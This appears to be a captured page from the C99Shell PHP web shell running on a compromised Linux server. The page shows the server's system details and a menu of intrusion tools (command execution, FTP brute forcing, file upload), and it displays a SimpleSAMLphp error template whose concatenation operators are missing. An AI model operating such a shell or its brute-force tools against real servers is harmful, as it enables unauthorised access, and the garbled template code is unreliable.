!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/apex_led/php/3ros/simplesamlphp/modules/authX509/templates/   drwxrwxr-x
Free 13.76 GB of 61.93 GB (22.21%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     X509error.php (1.3 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
$this
->data['header'] = $this->t('{authX509:X509error:certificate_header}');

$this->includeAtTemplateBase('includes/header.php');

?>

<?php
if ($this->data['errorcode'] !== NULL) {
?>
    <div style="border-left: 1px solid #e8e8e8; border-bottom: 1px solid #e8e8e8; background: #f5f5f5">
        <img src="/<?php echo $this->data['baseurlpath']; ?>resources/icons/experience/gtk-dialog-error.48x48.png" class="float-l" style="margin: 15px " />
        <h2><?php echo $this->t('{login:error_header}'); ?></h2>
        <p><b><?php echo $this->t('{errors:title_' $this->data['errorcode'] . '}'); ?></b></p>
        <p><?php echo $this->t('{errors:descr_' $this->data['errorcode'] . '}'); ?></p>
    </div>
<?php
}
?>
    <h2 style="break: both"><?php echo $this->t('{authX509:X509error:certificate_header}'); ?></h2>

    <p><?php echo $this->t('{authX509:X509error:certificate_text}'); ?></p>

    <a href="<?php echo htmlspecialchars(SimpleSAML_Utilities::selfURL()); ?>">
        <?php echo $this->t('{login:login_button}'); ?>
    </a>

<?php

if(!empty($this->data['links'])) {
    echo 
'<ul class="links" style="margin-top: 2em">';
    foreach(
$this->data['links'] AS $l) {
        echo 
'<li><a href="' htmlspecialchars($l['href']) . '">' htmlspecialchars($this->t($l['text'])) . '</a></li>';
    }
    echo 
'</ul>';
}




$this->includeAtTemplateBase('includes/footer.php');
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.5025 ]--